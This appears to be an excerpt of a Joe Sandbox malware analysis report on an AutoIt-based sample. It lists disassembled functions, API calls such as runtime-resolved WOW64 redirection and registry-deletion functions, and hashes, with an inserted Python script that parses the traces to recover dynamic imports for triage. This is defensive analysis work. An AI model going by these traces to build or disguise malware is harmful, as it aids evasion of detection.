                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%;
                                                                                                                    • API String ID: 3506404897-1637619084
                                                                                                                    • Opcode ID: bf80fbdcac755b2b39db3309b51741884c86b5ed06920178faea96b24ebbf1b0
                                                                                                                    • Instruction ID: ffdb630cb86340edfa6cac75239e98f47ace0829db7463fae4f5f72405ec8bb6
                                                                                                                    • Opcode Fuzzy Hash: bf80fbdcac755b2b39db3309b51741884c86b5ed06920178faea96b24ebbf1b0
                                                                                                                    • Instruction Fuzzy Hash: 77218071A00229AFCF12EF64DC82EEE77B9BF44700F504459F459AB281DB34EA45CBA1
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003A7772
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003A7787
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003A7794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 557f4e1ea0b95f908b9cf6eb70a5234ec3b426b5ca3052350b8a5e2834543003
                                                                                                                    • Instruction ID: 019137c9b0aed20eacff31d37bdca57e0fb96fb0b98b99373fd0500a13cef998
                                                                                                                    • Opcode Fuzzy Hash: 557f4e1ea0b95f908b9cf6eb70a5234ec3b426b5ca3052350b8a5e2834543003
                                                                                                                    • Instruction Fuzzy Hash: 6C11E772244208BEEF215F65CC45FE7776DEF8AB54F124119F641960A0D672E811CB10
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __calloc_crt
                                                                                                                    • String ID: =$@B>
                                                                                                                    • API String ID: 3494438863-1261725584
                                                                                                                    • Opcode ID: 5a257229bba5051e17cab9cc7781241534fec792a57b730521d514266411f3df
                                                                                                                    • Instruction ID: 5c87b7012247e5bc516d67ac509814b84de28e8b29dbc9dd7a2a852865122731
                                                                                                                    • Opcode Fuzzy Hash: 5a257229bba5051e17cab9cc7781241534fec792a57b730521d514266411f3df
                                                                                                                    • Instruction Fuzzy Hash: 47F06875604A118BF7779F56BC92B662BD9E701734F50091AE300CE6D0EB70AC4186C5
                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 00349B94
                                                                                                                      • Part of subcall function 00349C0B: __mtinitlocknum.LIBCMT ref: 00349C1D
                                                                                                                      • Part of subcall function 00349C0B: EnterCriticalSection.KERNEL32(00000000,?,00349A7C,0000000D), ref: 00349C36
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00349BA4
                                                                                                                      • Part of subcall function 00349100: ___addlocaleref.LIBCMT ref: 0034911C
                                                                                                                      • Part of subcall function 00349100: ___removelocaleref.LIBCMT ref: 00349127
                                                                                                                      • Part of subcall function 00349100: ___freetlocinfo.LIBCMT ref: 0034913B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                    • String ID: 8=$8=
                                                                                                                    • API String ID: 547918592-1747748129
                                                                                                                    • Opcode ID: 2bf307d6e6b3f4b8a7d517a676fe8fac4f7b8eac561715750ffaf91a2968ef63
                                                                                                                    • Instruction ID: 7964594b922025007c9961b51ac77c6c4dd7853624c23607dfe91ab635c8a64c
                                                                                                                    • Opcode Fuzzy Hash: 2bf307d6e6b3f4b8a7d517a676fe8fac4f7b8eac561715750ffaf91a2968ef63
                                                                                                                    • Instruction Fuzzy Hash: 43E08C32D4BB00AAEA13BBE47903B4E2BD49B00B21F20015BF0555D1C1CEB438008617
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324B83,?), ref: 00324C44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00324C56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: 96918b5cb33adfa5254dd2c49ea59e3afa72452af909087cb6e4c7fddff8a3c9
                                                                                                                    • Instruction ID: 81b48fbc744eb045cc11bc0553d0cd86830f79f7a355ee55101362ea3155d398
                                                                                                                    • Opcode Fuzzy Hash: 96918b5cb33adfa5254dd2c49ea59e3afa72452af909087cb6e4c7fddff8a3c9
                                                                                                                    • Instruction Fuzzy Hash: CFD01231510723DFD7225F75E94864676E9EF06351F11883AD497D6160E670D480C650
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324BD0,?,00324DEF,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324C11
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00324C23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 144f37dc0ea9fc6d581754f46d60c94fadbea65c0451cb75e438a8f12a3b2c55
                                                                                                                    • Instruction ID: b0ebac2618c66e115c2dcf1f7a8ad7686d2dc68393c9c2e0ddd73421276c345f
                                                                                                                    • Opcode Fuzzy Hash: 144f37dc0ea9fc6d581754f46d60c94fadbea65c0451cb75e438a8f12a3b2c55
                                                                                                                    • Instruction Fuzzy Hash: 85D01231511723DFD722AFB5ED48646B6E9EF0A352F118C3AD486D6160E6B0D480C650
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,003A1039), ref: 003A0DF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A0E07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 4e11be68763bbbb3a99c371259dc8e1d97f33a35cd2af4002d70a2f6bc41b962
                                                                                                                    • Instruction ID: 3c819ac8f2366531a995d012635b536ffc4c29d5290601a423b2470273558120
                                                                                                                    • Opcode Fuzzy Hash: 4e11be68763bbbb3a99c371259dc8e1d97f33a35cd2af4002d70a2f6bc41b962
                                                                                                                    • Instruction Fuzzy Hash: 79D01271550712CFD7235FB5E848786B6D9AF16351F118C7FD486D2250D6B0D490C650
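                                                                                                                     The three LoadLibraryA/GetProcAddress blocks above are what the report's "Contains functionality to dynamically determine API calls" signature is built from: Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection and RegDeleteKeyExW are looked up by name at run time rather than appearing in the static import table (the call arguments, including ">>>AUTOIT NO CMDEXECUTE<<<", are consistent with the AutoIt runtime the report says this sample is built on). When triaging a report like this one it is useful to recover those resolved imports mechanically. The Python below is an added example written for this page, not Joe Sandbox code: it parses API lines in exactly the format printed in the blocks above (the SAMPLE text is constructed by copying lines from this page), splits them into per-function blocks, and pairs each GetProcAddress with the closest preceding LoadLibrary* call to produce library!symbol names an analyst can diff against the PE's static imports. The function and field names (parse_api_blocks, dynamic_imports, resolve_report, ApiCall) are this example's own and are not used by the sandbox.

```python
"""Parse Joe Sandbox 'APIs' lines and recover dynamically resolved imports.

Added example for this page; not Joe Sandbox code. The line format is the
one printed in the report blocks above; SAMPLE is constructed from them.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines copied from the blocks on this page.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00324B83,?), ref: 00324C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00324C56
Strings
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00324BD0,?,00324DEF,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00324C23
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,003A1039), ref: 003A0DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A0E07
Strings
APIs
• __lock.LIBCMT ref: 00349B94
  • Part of subcall function 00349C0B: __mtinitlocknum.LIBCMT ref: 00349C1D
  • Part of subcall function 00349C0B: EnterCriticalSection.KERNEL32(00000000,?,00349A7C,0000000D), ref: 00349C36
Strings
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: ADDRESS   (the argument list is optional).
API_RE = re.compile(
    r"^\s*[•*]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                # call-site address in the dumped image
    subcall: Optional[str]  # callee address when the line is "Part of subcall"


def parse_api_blocks(text: str) -> List[List[ApiCall]]:
    """Split the report into per-function blocks ('APIs' ... 'Strings')."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":        # header of the next function block
            current = []
            blocks.append(current)
            continue
        if stripped == "Strings":     # end of the API list for this block
            current = None
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            current.append(ApiCall(
                api=m.group("api"), module=m.group("mod"),
                args=args.split(",") if args else [],
                ref=m.group("ref"), subcall=m.group("sub")))
    return blocks


def dynamic_imports(block: List[ApiCall]) -> List[str]:
    """Pair every GetProcAddress with the closest preceding LoadLibrary* call.

    The report prints the module handle as 00000000, so the library name has
    to come from the LoadLibrary* argument list (args[0]); the symbol is the
    second GetProcAddress argument.
    """
    resolved, library = [], "?"
    for call in block:
        if call.api.startswith("LoadLibrary") and call.args:
            library = call.args[0].lower()
        elif call.api == "GetProcAddress" and len(call.args) >= 2:
            resolved.append(f"{library}!{call.args[1]}")
    return resolved


def resolve_report(text: str) -> dict:
    """Summary an analyst can diff against the PE's static import table."""
    blocks = parse_api_blocks(text)
    return {
        "blocks": len(blocks),
        "calls": sum(len(b) for b in blocks),
        "dynamic": sorted({imp for b in blocks for imp in dynamic_imports(b)}),
        "subcalls": sorted({c.subcall for b in blocks for c in b if c.subcall}),
    }


if __name__ == "__main__":
    for key, value in resolve_report(SAMPLE).items():
        print(f"{key}: {value}")
```

                                                                                                                     Run against the full report text instead of SAMPLE, the "dynamic" list is the set of names to check against the static import directory; any name present here but absent there was resolved only at run time. Pairing by "closest preceding LoadLibrary*" matches how these small resolver stubs are laid out in this sample (one LoadLibraryA immediately followed by one GetProcAddress); a block that loads several libraries before resolving symbols would need the pairing to track handles rather than order.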
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00398CF4,?,003AF910), ref: 003990EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00399100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: f449b2ddeecc02ce2c12a874a2185b62d524528a9033cb2e071936c4acea901b
                                                                                                                    • Instruction ID: aacdd36ce8fb1781275d4368f419f749b4bcf3af86a9aa6238167f883d880b87
                                                                                                                    • Opcode Fuzzy Hash: f449b2ddeecc02ce2c12a874a2185b62d524528a9033cb2e071936c4acea901b
                                                                                                                    • Instruction Fuzzy Hash: 18D01235510713CFDB229F76D85864676E8AF06352F178C3ED486D6550E670D480C650
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: d8b60cf86c03b3981e46b3ea6cb27a5d39882d3d8f4305f812d0a2d09dd37b2e
                                                                                                                    • Instruction ID: fd8c29aea86cd04e636d189c433bd43ec69df5aeedcb1808933cd997fa2fdd81
                                                                                                                    • Opcode Fuzzy Hash: d8b60cf86c03b3981e46b3ea6cb27a5d39882d3d8f4305f812d0a2d09dd37b2e
                                                                                                                    • Instruction Fuzzy Hash: A1D05E72804119FACB039B90EC8CDFD73BCAB09301F188463F406E3444E2369B94EA21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 280b8f40837f8e4d9c9d1ad5fe654a56076bd35329a217da397fa1e49c520843
                                                                                                                    • Instruction ID: 069559296681739f2f8fc813d0eb6dcb8a8b8e4ecb691fd2ff1b928ae68f0a1d
                                                                                                                    • Opcode Fuzzy Hash: 280b8f40837f8e4d9c9d1ad5fe654a56076bd35329a217da397fa1e49c520843
                                                                                                                    • Instruction Fuzzy Hash: 74C19174A04216EFDB25CFA5C884EAEBBF5FF48304B158998E809EB251D734DD81DB90
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0039E0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0039E101
                                                                                                                      • Part of subcall function 0039D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0039D7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0039E301
                                                                                                                    • _memmove.LIBCMT ref: 0039E314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: 89bbdb87753830d34ee430ada4de5161cb03c7dcd7bb2235f3ceeef92247d61e
                                                                                                                    • Instruction ID: 4861e7a480c965dfc5580725e0343e46a7d108d700d66b17e72baba9367d417b
                                                                                                                    • Opcode Fuzzy Hash: 89bbdb87753830d34ee430ada4de5161cb03c7dcd7bb2235f3ceeef92247d61e
                                                                                                                    • Instruction Fuzzy Hash: AEC15975608311DFCB06DF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB82
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003980C3
                                                                                                                    • CoUninitialize.OLE32 ref: 003980CE
                                                                                                                      • Part of subcall function 0037D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0037D5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003980D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003983AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
                                                                                                                    • Opcode ID: 78666d91679e3ff899c1e3dfda9703c00a0500479574e53b9b3d4348d2d5cbbe
                                                                                                                    • Instruction ID: e2467d7790d08f1abe6cb6261b5ebc9922ca4513da7d267ca387922710edf2c4
                                                                                                                    • Opcode Fuzzy Hash: 78666d91679e3ff899c1e3dfda9703c00a0500479574e53b9b3d4348d2d5cbbe
                                                                                                                    • Instruction Fuzzy Hash: F1A17C396047119FCB12DF64C481B2AB7E4BF8A714F18485DF99A9B3A1CB34EC45CB86
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: f08a16a183d4059514cf0250554ff801b81fea4eb7f7256f3fab3d6bbb9bd357
                                                                                                                    • Instruction ID: 09461d03a050020a46ea2c522e65c70947a645f772d96308d0a561a2513510fc
                                                                                                                    • Opcode Fuzzy Hash: f08a16a183d4059514cf0250554ff801b81fea4eb7f7256f3fab3d6bbb9bd357
                                                                                                                    • Instruction Fuzzy Hash: 3251C9B4700B019EDB76AF65D8B262AB3E99F45310F20D81FE59EDB691DB38D8408701
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(011BE578,?), ref: 003A9863
                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 003A9896
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003A9903
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: 275eda52d738ac86ef8841180b8161142b7f0e76e0402ad19ac0636b2d17b246
                                                                                                                    • Instruction ID: 14aa31a56a0eb4c0028e85dc587e890bb76aa0fa60acf3979e35fb852836b927
                                                                                                                    • Opcode Fuzzy Hash: 275eda52d738ac86ef8841180b8161142b7f0e76e0402ad19ac0636b2d17b246
                                                                                                                    • Instruction Fuzzy Hash: B7515334A00205EFCF26CF54C884AAE7BB9FF56360F15825EF955AB2A0D731AD41CB90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00379AD2
                                                                                                                    • __itow.LIBCMT ref: 00379B03
                                                                                                                      • Part of subcall function 00379D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00379DBE
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00379B6C
                                                                                                                    • __itow.LIBCMT ref: 00379BC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
